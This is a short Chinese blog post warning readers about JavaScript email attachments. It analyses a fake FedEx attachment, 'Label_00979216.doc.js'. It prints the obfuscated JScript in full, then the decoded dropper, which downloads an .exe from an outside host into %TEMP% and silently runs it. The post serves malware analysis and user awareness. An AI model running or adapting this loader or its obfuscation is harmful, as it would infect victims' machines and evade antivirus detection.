20160307 - 双击打开 Js 扩展名的附件要保持留心
Windows Script Host 技术是一门很老的技术,它让 Windows 的自带脚本 VBScript 和 JScript 可以操作 Windows ActiveX 对象,这样的脚本具有本地权限,比如本地文件系统的访问,网络的访问等。我在邮件中收到一封来自联邦快递的邮件。附件为:Label_00979216.doc.js,很简单的混淆并压缩,代码如下,
var a5 = 'va'; var a3 = 'l'; var a1 = ''; var a4 = 'e'; function opx() { a1 += 's('; pfo(); }; function fef() { a1 += 'Strea'; iq(); }; function ciq() { a1 += 'GET"'; ch(); }; function m() { a1 += ' Act'; es(); }; function obm() { a1 += ' v'; sqf(); }; function fzw() { a1 += 'rn'; yeu(); }; function pab() { a1 += 'Shel'; xwm(); }; function cr() { a1 += '; xa.'; elt(); }; function jj() { a1 += 'xa ='; rd(); }; function ny() { a1 += 'ry '; wk(); }; function ke() { a1 += 'fn'; lh(); }; function wbl() { a1 += 'e =='; fpg(); }; function ueh() { a1 += '9531'; n(); }; function ma() { a1 += '= 0'; cr(); }; function q() { a1 += '); xo'; s(); }; function rb() { a1 += '2455'; em(); }; function so() { a1 += '= '; upv(); }; function xo() { a1 += 'pandE'; dyu(); }; function xtj() { a1 += 'r,fal'; qj(); }; function j() { a1 += ');'; lyg(); }; function dyr() { a1 += 'pt.'; pab(); }; function dyu() { a1 += 'nvir'; x(); }; function lyg() { a1 += ' }; }'; pws(); }; function suv() { a1 += '00D10'; tla(); }; function sdx() { a1 += '; '; wun(); }; function uet() { a1 += 'rnd'; jp(); }; function exo() { a1 += 'n;'; ht(); }; function wqb() { a1 += 'r)'; whi(); }; function zh() { a1 += 'se'; rj(); }; function zc() { a1 += '};'; azk(); }; function elt() { a1 += 'saveT'; qw(); }; function x() { a1 += 'on'; jq(); }; function rj() { a1 += 'nd()'; twi(); }; function bmc() { a1 += 'on'; bq(); }; function xwm() { a1 += 'l");'; obm(); }; function dt() { a1 += 'a.po'; cn(); }; function yeu() { a1 += ' > 0'; ws(); }; function ow() { a1 += 'xe",1'; gw(); }; function bxl() { a1 += 'Strin'; zko(); }; function le() { a1 += '); x'; dt(); }; function nj() { a1 += 'p?id'; ctl(); }; function a() { a1 += ' new'; m(); }; function mok() { a1 += ' 1; '; hma(); }; function e() { a1 += 'Scri'; dyr(); }; function qw() { a1 += 'oFi'; kg(); }; function pc() { a1 += '38'; adj(); }; function ruz() { a1 += ')+f'; exo(); }; function yfs() { a1 += ' }'; cw(); }; function kva() { a1 += 'L2.X'; kf(); }; function ywg() { a1 += ',0,0)'; ze(); }; function egd() { a1 += 'a.o'; gz(); }; function bq() { a1 += '() '; mqo(); }; function yey() { a1 += 'dl(fr'; fo(); }; function p() { a1 += 'ng'; opx(); }; function gw() { a1 += ');'; ne(); }; function jp() { a1 += '=583'; ueh(); }; function ze() { a1 += '; '; ywx(); }; function wk() { a1 += '{ x'; lf(); }; function mqo() { a1 += '{ if'; u(); }; function hma() { a1 += 'xa.wr'; oct(); }; function lyq() { a1 += 'MS'; ta(); }; function fo() { a1 += ',fn,'; ra(); }; function aa() { a1 += 's5-'; k(); }; function lf() { a1 += 'o.'; bqk(); }; function iec() { a1 += 'onse'; l(); }; function pws() { a1 += '; t'; ny(); }; function gz() { a1 += 'pen()'; sdx(); }; function i() { a1 += 'yst'; lg(); }; function la() { a1 += ' ='; tbz(); }; function ta() { a1 += 'XM'; kva(); }; function kf() { a1 += 'MLH'; zpg(); }; function yt() { a1 += 'com/d'; plz(); }; function ovq() { a1 += 'P%")+'; bxl(); }; function ia() { a1 += ':/'; zll(); }; function kg() { a1 += 'le('; ke(); }; function ff() { a1 += 'r ws'; y(); }; function pp() { a1 += 'fn'; ywg(); }; function n() { a1 += '","8'; ym(); }; function g() { a1 += 'xo '; so(); }; function ng() { a1 += 'xo.'; zh(); }; function mlz() { a1 += '("'; ciq(); }; function ym() { a1 += '44'; pc(); }; function kqc() { a1 += '09&'; uet(); }; function omc() { a1 += '("W'; e(); }; function wun() { a1 += 'xa.ty'; tp(); }; function ctl() { a1 += '=54'; pt(); }; function lg() { a1 += 'atec'; ors(); }; function bmm() { a1 += 'XObje'; rvo(); }; function zko() { a1 += 'g.fro'; fr(); }; function ch() { a1 += ',f'; xtj(); }; function l() { a1 += 'Body'; le(); }; function jq() { a1 += 'mentS'; jf(); }; function em() { a1 += '565'; jet(); }; function cw() { a1 += ' catc'; dig(); }; function yv() { a1 += 'e(92'; ruz(); }; function twi() { a1 += '; '; oy(); }; function ws() { a1 += ') { '; zo(); }; function zpg() { a1 += 'TTP"'; q(); }; function s() { a1 += '.onre'; pao(); }; function rd() { a1 += ' new '; kh(); }; function vp() { a1 += 'XOb'; dwx(); }; function vrm() { a1 += 'Act'; v(); }; function oi() { a1 += 'ion '; ma(); }; function lvc() { a1 += 'D01'; rb(); }; function pt() { a1 += '51'; cg(); }; function bqk() { a1 += 'open'; mlz(); }; function etm() { a1 += 'Run('; pp(); }; function hp() { a1 += '("AD'; b(); }; function whi() { a1 += ' { }'; ssb(); }; function v() { a1 += 'ive'; bmm(); }; function w() { a1 += 'Stat'; wbl(); }; function oct() { a1 += 'ite'; pd(); }; function zll() { a1 += '/app.'; aa(); }; function qj() { a1 += 'se); '; ng(); }; function plz() { a1 += 'ocume'; wld(); }; function oy() { a1 += 'if ('; fzw(); }; function b() { a1 += 'ODB.'; fef(); }; function h() { a1 += 'ctio'; o(); }; function zo() { a1 += 'ws.'; etm(); }; function es() { a1 += 'ive'; vp(); }; function r() { a1 += 'va'; ff(); }; function aey() { a1 += 'rCod'; yv(); }; function adj() { a1 += '33'; fpe(); }; function tla() { a1 += '0D011'; lvc(); }; function kh() { a1 += 'Acti'; zn(); }; function ors() { a1 += 'hange'; c(); }; function sqf() { a1 += 'ar fn'; la(); }; function zr() { a1 += ' var '; jj(); }; function jn() { a1 += 'esp'; iec(); }; function fpg() { a1 += '= 4'; oh(); }; function iq() { a1 += 'm")'; tgk(); }; function nyj() { a1 += 'ready'; w(); }; function ht() { a1 += ' var '; g(); }; function k() { a1 += 'tech.'; yt(); }; function ttg() { a1 += 'bject'; hp(); }; function t() { a1 += 'ncti'; bmc(); }; function bb() { a1 += 'xa.c'; lfp(); }; function o() { a1 += 'n '; yey(); }; function tbz() { a1 += ' ws'; fkc(); }; function jf() { a1 += 'tri'; p(); }; function iiw() { a1 += '("'; my(); }; function ssb() { a1 += '; '; zc(); }; function wq() { a1 += '0B'; kqc(); }; function ra() { a1 += 'rn)'; tux(); }; function oh() { a1 += ') {'; zr(); }; function my() { a1 += 'http'; ia(); }; function owg() { a1 += 'fu'; t(); }; function lh() { a1 += ',2); '; bb(); }; function tux() { a1 += ' { '; r(); }; function wld() { a1 += 'nt.ph'; nj(); }; function ywx() { a1 += '};'; yfs(); }; function tgk() { a1 += '; x'; egd(); }; function dwx() { a1 += 'ject'; omc(); }; function lfp() { a1 += 'lose('; j(); }; function fpe() { a1 += '5.e'; ow(); }; function upv() { a1 += 'new '; vrm(); }; function kag() { a1 += ' ='; mok(); }; function ne() { this[a4 + a5 + a3](a1); }; function rvo() { a1 += 'ct("'; lyq(); }; function fr() { a1 += 'mCha'; aey(); }; function dig() { a1 += 'h (e'; wqb(); }; function u() { a1 += ' (xo.'; nyj(); }; function y() { a1 += ' ='; a(); }; function fkc() { a1 += '.Ex'; xo(); }; function azk() { a1 += ' dl'; iiw(); }; function tp() { a1 += 'pe'; kag(); }; function pd() { a1 += '(xo.R'; jn(); }; function pao() { a1 += 'ad'; i(); }; function fs() { a1 += 'fun'; h(); }; function c() { a1 += ' = '; owg(); }; function jet() { a1 += '24A07'; wq(); }; function cn() { a1 += 'sit'; oi(); }; function pfo() { a1 += '"%TEM'; ovq(); }; function zn() { a1 += 'veXO'; ttg(); }; function cg() { a1 += '515E1'; suv(); }; fs();
虽然简单,但这样的代码不会被任何杀毒软件识别并查杀,稍看了看,属于字符串拼接为一个函数并 eval 执行,于是将最终执行前的函数:
function gw() { a1 += ');'; ne(); };
改为:
function gw() { a1 += ');'; //ne(); WScript.Echo(a1); };
复制出内容如下:
function dl(fr, fn, rn) { var ws = new ActiveXObject("WScript.Shell"); var fn = ws.ExpandEnvironmentStrings("%TEMP%") + String.fromCharCode(92) + fn; var xo = new ActiveXObject("MSXML2.XMLHTTP"); xo.onreadystatechange = function() { if (xo.readyState === 4) { var xa = new ActiveXObject("ADODB.Stream"); xa.open(); xa.type = 1; xa.write(xo.ResponseBody); xa.position = 0; xa.saveToFile(fn, 2); xa.close(); }; }; try { xo.open("GET", fr, false); xo.send(); if (rn > 0) { ws.Run(fn, 0, 0); }; } catch (er) {}; }; dl("http://app.s5-tech.com/document.php?id=XX51515E100D100D011D01245556524A070B09&rnd=5839531", "84438335.exe", 1);
似乎是远程下载一个文件写入本地,并执行。地址已经失效,于是没有下载作进一步的分析。
但提醒一下:双击打开 Js 扩展名的附件要保持留心。